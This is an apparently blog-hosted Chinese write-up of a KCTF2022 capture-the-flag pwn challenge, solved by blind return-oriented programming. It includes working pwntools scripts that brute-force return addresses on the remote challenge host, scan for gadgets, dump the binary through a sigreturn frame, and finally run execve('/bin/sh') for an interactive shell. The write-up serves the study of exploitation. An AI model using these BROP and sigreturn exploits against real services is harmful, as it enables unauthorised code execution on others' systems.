清风细雨楼 Design By www.eepep.com

KCTF2022春季赛 第六题 writeup

<!--more-->

这题,BROP提示给的很明显,所以就是盲打,不管怎么说先问(bao)候(da)一下出题人。

首先我们一开始什么都不知道,就先确定一下一些基本信息,那么就先测试一下缓冲区的长度,最后发现缓冲区长度为0x10。

我们先执行一遍正常流程,大概就是:

  1. 输出一句话
  2. 输入
  3. 输出一句话

当存在栈溢出的时候,最后一句话输出不出来,因此可以断定,溢出是发生在自己定义的函数的。大概写一下伪代码:

#include<stdio.h>void func(){    char buf[16];    gets(buf);}int main(){    puts("hacker, TNT!");    func();    puts("TNT TNT!");}

当然,输出第一句话的语句可能也在 func 里面,但是不影响,我们先爆破第一个字节

from pwn import  *#context.log_level='debug'for i in range(0,256):    try:        p=remote(host='221.228.109.254',port=10100)        s=p.recvline()        payload=b'a'*0x10+p8(i)        print(payload)        p.send(payload)        ss=(p.recvline(timeout=1))        print(ss)        p.close()    except:        p.close()        continue

KCTF2022春季赛 第六题 writeup

KCTF2022春季赛 第六题 writeup

可以发现,当覆盖一个 \xb0 字节的时候,程序重新执行了一遍 main 函数,当覆盖一个 \xce 字节的时候,程序执行正常流程退出了,那么我们可以得出以下信息:

  • main 函数的低位为 0xb0
  • func 函数的返回地址为 0xce

这里其实可以确定输出第一句话的函数在 main 当中了,因为如果在 func 函数当中,那么一定会存在两个地址使得程序重新执行一遍流程,那就是改成了 func 函数和 main 函数的地址都会这样,没有就说明第一句话输出不在 main 当中。

然后再勇敢地一试,猜测它的地址为 0x4000b0,结果发现也是重新执行了 main 函数,这也间接断定了这个程序是 64 位的。上面推出的两个地址也确定了。

接下来,就可以尝试取寻找 gadget 了,我们要寻找的首要 gadget 自然就是 pop rdi ret 了。

from pwn import  *#context.log_level='debug'main=0x4000b0ret=0x4000cefor i in range(0x400000,0x401900):    try:        while True:            try:                p=remote(host='221.228.109.254',port=10100)                break            except:                continue        s=p.recvline()        payload=b'a'*0x10+p64(i)+p64(ret)+p64(main)        print(payload)        p.send(payload)        ss=(p.recvline(timeout=1))        print(ss)        p.close()    except:        p.close()        continue

在这个 payload 当中,可以发现,如果寻找的 gadgetret,那么则会继续流程,如果 gadget 类似于 pop xxx ret 的话则会重新执行 main 函数。结果 ret 找到了很多,其它的 gadget 愣是没找到一个,于是决定往后面再加一个 p64(main),结果居然找到了七个地址:

a0x4000f5 pop xxx *2;ret0x4000fa pop xxx *2;ret0x4000fb pop xxx *2;ret0x4000fd pop xxx *2;ret0x4000fe pop xxx *2;ret0x400100 pop xxx *2;ret0x400101 ret0x400102 pop xxx *2 ; ret0x400106 ret

然后我尝试取寻找它的 IO 函数去输出它的 got 表,但是测了很多地址都没有发现有输出 \n 字节,这里也排除它用 puts 函数输出的可能,但是它可能也用了 printf 或者是 write 函数之类的,但是我还是往 printf 去想而没有往 write 去想。然后我就拿那些 gadget 试着传参看看,结果不出意外都失败了,无任何回显。

这里我困扰了很久,后来我们队的 ThTsOd 师傅给了我一个很重要的思路,那就是

KCTF2022春季赛 第六题 writeup

再来看看精致得分的规则:

KCTF2022春季赛 第六题 writeup

直接拉满了那就很能说明问题了,肯定是甚至没有 plt 或者 got 表的那种文件,直接用的 syscall 才能有这么小的长度。

这里借用以下 ThTsOd 师傅的脚本,帮我们确定了一些 syscall 的位置。

from pwn import  *context.log_level='warn'main=0x4000b5ret=0x400101pop_rdi = 0x400101 - 1pop_rsi_2 = 0x400101 - 3'''0x4000b0 0 b'hacker, TNT!\n'0x4000ce 0 b'TNT TNT!\n'INPUT0x4000b5 0 b'TNT TNT!\n'0x4000b6 0 b'TNT TNT!\n'0x4000b8 0 b'TNT TNT!\n'0x4000c2 0 b'TNT TNT!\n'0x4000c7 0 b'TNT TNT!\n'0x4000c9 0 b'TNT TNT!\n'rdi 1rsi strrdx len'''for k in range(1):    for i in range(0x400000,0x400120):        try:            while True:                try:                    p=remote(host='221.228.109.254',port=10005)                    break                except:                    continue            s=p.recv()            payload=b'a'*0x10+p64(i)+p64(pop_rdi)*3+p64(1)+p64(pop_rsi_2)+p64(0x400000)*2+p64(0x4000ce)            #payload=b'a'*0x10+            #print(payload)            p.send(payload)            p.send('B')            ss=(p.recvall(timeout=1))            print(hex(i),k,ss)            #if ss==s:            #    break            p.close()        except:            #sleep(2)            p.close()            continue#p.interactive()'''41 5c 41 5d 41 5e 41 5f c3rdi 1rsi strrdx len101 RET102 POP106 RET'''

在这个脚本中,我们通过修改 rax 的值成功调用sys_read dump 出了栈上面的内存。

KCTF2022春季赛 第六题 writeup

由此我们确定了 syscall retgadget0x4000ec 的地方。但是还需要有一个固定能 readgadget 才行,因为只有这样我们才能控制 rax 寄存器的值,来选择我们需要的系统调用。

当然我们也找到了,在0x4000f3,并且发现需要传两个参数才能把 rop 链拼接上去,感觉这里两个参数应该是 add rsp,0x10 产生的。

那也不用管那么多了,通过这两个 gadget 我们就能进行一次指定的系统调用,这里我们不选择使用 write 调用泄露栈的内存,我们直接把 elf 的内存给 dump 出来就行,因为没有 gadget 那我们直接用 sigreturn 的方式控制寄存器。

from pwn import  *context.log_level='debug'context.arch='amd64'main=0x4000b5ret=0x400101pop_rdi = 0x400101 - 1pop_rsi_2 = 0x400101 - 3syscall=0x4000ecsysread=0x4000f3'''0x4000b0 0 b'hacker, TNT!\n'0x4000ce 0 b'TNT TNT!\n'INPUT0x4000b5 0 b'TNT TNT!\n'0x4000b6 0 b'TNT TNT!\n'0x4000b8 0 b'TNT TNT!\n'0x4000c2 0 b'TNT TNT!\n'0x4000c7 0 b'TNT TNT!\n'0x4000c9 0 b'TNT TNT!\n'rdi 1rsi strrdx len'''for k in range(1):    for i in range(0x4000f3,0x4000f4):        try:            while True:                try:                    p=remote(host='221.228.109.254',port=10088)                    break                except:                    continue            s=p.recv()            rop=SigreturnFrame()            rop.rax=1            rop.rdi=1            rop.rip=syscall                        rop.rsp=0x400000            rop.rbp=0x400000            rop.rsi=0x400000            rop.rdx=0x400            payload=b'a'*0x10+p64(sysread)+p64(0)*2+p64(syscall)+eval(str(rop))            p.send(payload)            p.send('B'*15)            p.interactive()                except:            #sleep(2)            p.close()            continue#p.interactive()'''41 5c 41 5d 41 5e 41 5f c3rdi 1rsi strrdx len101 RET102 POP106 RET'''

KCTF2022春季赛 第六题 writeup

可以看到我们就成功用 sigreturn 调用了 sys_write(1,0x400000,0x400) ,至此终于不是瞎子视角了,这里再是 ThTsOd 师傅帮我重建了 ELF 文件,IDA 一开

KCTF2022春季赛 第六题 writeup

其实现在 IDA 已经不重要了,主要还是能本地调试就非常爽。

但是这里又卡了一个关,那就是找不到确定地址可写的地方写上 /bin/sh。这里又双叒叕是 ThTsOd 师傅向我指明了 0x600000 处的内存是可读可写的。

KCTF2022春季赛 第六题 writeup

打开一看果然是这样,而且给的内存还挺多,那就爽了,直接先调用 sys_read 再上面写上 /bin/sh 顺便接上 rop 链,然后再一次 sigreturn 执行 execve('/bin/sh',0,0)  去获得 shell

最终 exp

from pwn import *context.log_level='debug'context.arch='amd64'main=0x4000b5ret=0x400101syscall=0x4000ecsysread=0x4000f3#p=process('./pwn')p=remote(host='221.228.109.254',port=10100)s=p.recv()rop=SigreturnFrame()rop.rax=0rop.rdi=0rop.rip=syscall            rop.rsp=0x600020rop.rbp=0x600020rop.rsi=0x600000rop.rdx=0x400payload=b'a'*0x10+p64(syscall)+p64(syscall)+eval(str(rop))p.send(payload)#sleep(1)#gdb.attach(p)p.send(b'a'*15)rop.rax=59rop.rip=syscallrop.rdi=0x600000rop.rdx=0rop.rsi=0sleep(1)p.send(b'/bin/sh\0'+p64(sysread)+p64(0)*2+p64(syscall)+eval(str(rop)))sleep(1)p.send(b'a'*15)p.interactive()

这题后面不难,主要是想办法 dump 内存重建 elf,然后就是签到的做法了。